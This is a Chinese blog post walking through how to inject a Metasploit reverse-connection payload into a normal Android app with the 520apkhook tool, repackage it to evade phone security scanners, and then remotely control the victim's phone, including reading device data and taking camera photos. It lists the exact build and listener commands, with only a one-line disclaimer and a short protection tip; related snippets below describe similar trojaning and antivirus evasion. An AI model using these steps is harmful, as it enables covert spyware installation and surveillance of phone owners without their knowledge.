MSF+APK注入绕过手机防护上线远控及安全防护建议

最新推荐文章于 2024-05-28 16:03:56 发布
最新推荐文章于 2024-05-28 16:03:56 发布
阅读量6.3k 收藏 49
点赞数 3
分类专栏: APP安全 文章标签: CTF 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/121372261
版权

1.实验环境

MSF、520_APK_HOOK

2.介绍

将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。
项目地址: https://github.com/cleverbao/520apkhook
作者: BaoGuo

优点
相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。
注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。
被注入后的app可以正常运行,msf正常在线,继承app的权限
重点说明
本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.
部分被加固过的app无法进行注入,已测试网易系列???,360系列???,腾讯系列❤️,其他的请自行测试。
使用
下载安装所需运行库
在这里插入图片描述
安装之后运行

python3 main.py --lhost 192.168.0.109 --lport 1433  -n com.xiachufang_8.1.1_692.apk

结束后就可以加载文件进行监听

msfconsole -r WorkDir/handler.rc    #加载工具下文件,其实就是打包的监听命令

将生成的apk文件在安卓手机进行安装, 即可完成对目标的控制
成功后, 可以在msf中进行远程控制
在这里插入图片描述
查看手机信息:
在这里插入图片描述
拍照:
打开手机摄像头拍照并保存在指定目录下
在这里插入图片描述

注意事项:其他功能自测,其他高级控制权限可能需要手机root
测试结果:光环助手app通过,下厨房app不通过。
防护建议:下载手机应用请到正规的应用市场下载,非必要情况下不要开启root权限。

网络安全练习生
关注
  • 3
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
简单的一次手机APK注入
AomCC的博客
08-23 1122
一次简单的手机APP木马注入
com.variable.apkhook:应用伪装
04-08
com.variable.apkhook Module name 应用伪装 Author 酷安@ Description 模块的二次开发版,暂未开源 Secondary development version of module, not open sourced yet. 为你选择的应用程序传递你伪造的手机信息 Deliver the fake informations you made about your phone to the apps you selected Usage 原作者并没有解释用法,以下的使用教程取自应用变量模块的描述: 首先,你需要选择你想要传递手机伪装信息给哪些APP, (不仅仅在模块中选取,还需要添加到模块作用域中以确保模块可以作用于APP) 然后在模块里填写手机的伪装信息,最后,只需单独重启这些APP即可. Since the author didn'
MSF渗透Android
最新发布
Yxisobai的博客
05-28 1107
kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。
卡利渗透旧安卓
Aeroguita_Ex的博客
05-13 983
我们把apk脱到android虚拟机中安装,这里我改了一下名字,想装得像一点还可以给他加工图标,或者用原本功能正常的apkmsf520apkhook加木马(亲测可行,推荐小一点的什么连点器之类,相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。1.最好的办法就是不安装不认识的软件。
APP安全测试——HOOK技术
热门推荐
LiBai'S BLOG
03-21 2万+
最近学习app的测试学会了客户端的测试方法。只知道怎么实现将其中存在的漏洞和不合规项找出来但是不知道其中的原理。一直再说HOOK技术,也就是所谓的钩子今天了解一下他到底是个啥东西。 HOOK Hook 英文翻译过来就是「钩子」的意思,那我们在什么时候使用这个「钩子」呢?在 Android 操作系统中系统维护着自己的一套事件分发机制。应用程序,包括应用触发事件和后台逻辑处理,也是根据事件流程一步步地向下执行。而「钩子」的意思,就是在事件传送到终点前截获并监控事件的传输,像个钩子钩上事件一样,并且能够在钩上事件
msf入侵安卓实战
m0_65109001的博客
01-04 2478
msf安卓渗透
kali使用msf+apkhook520+cploar实现安卓手的攻击
CvtNhso的博客
04-10 2508
学习网络安全的过程中,突发奇想怎么才能控制或者说是攻击手机边找工作边实验话不多说启动kali。
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1 绕过火绒安全提权实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器权限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
MSF(3)——apk和exe的加马(过360、火绒)
realmels的博客
08-07 6657
apk和exe加马免杀的方法
探秘520ApkHook:一款强大的Android应用调试工具
gitblog_00007的博客
04-11 573
探秘520ApkHook:一款强大的Android应用调试工具 项目地址:https://gitcode.com/cleverbao/520apkhook 520ApkHook 是一个专为Android开发者和逆向工程师设计的神器,它提供了一种简单、高效的方式来动态劫持APK中的方法调用,极大地增强了Android应用的调试和分析能力。 项目简介 520ApkHook的核心是一个轻量级的注入引擎,...
利用MSF打包加固APK对安卓手机进行控制
dl1286670932的博客
10-08 6968
由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。
apkhook机制
懒猫的脚印
09-15 1402
apkhook机制,
adb 安装apk到指定手机 登录shell
weixin_33971977的博客
01-07 181
电脑链接多个设备时,给指定的设备安装apk, 1. 先查看手机的编码 adb devices 2. adb -s 手机编码 install xxx.apk 如果是无线链接调试状态,adb devices 会显示该手机的ip 如:10.1.6.10:5555 5555是手机的默认端口 3 adb -s  10.1.6.155:5555 install xxx.apk   顺便说一下ec...
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2240
使用msfvenom生成木马控制手机
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 724
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
使用Shellter与Shielden双重加壳技术绕过安全软件检测
1. **Shellter**:是一个可以将恶意代码注入到正常32位软件的工具,用于绕过杀毒软件。 2. **Windows环境下的加壳**:在Windows 10虚拟机上成功应用Shellter进行加壳,克服了Kali Linux环境的兼容性问题。 3. **永恒...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值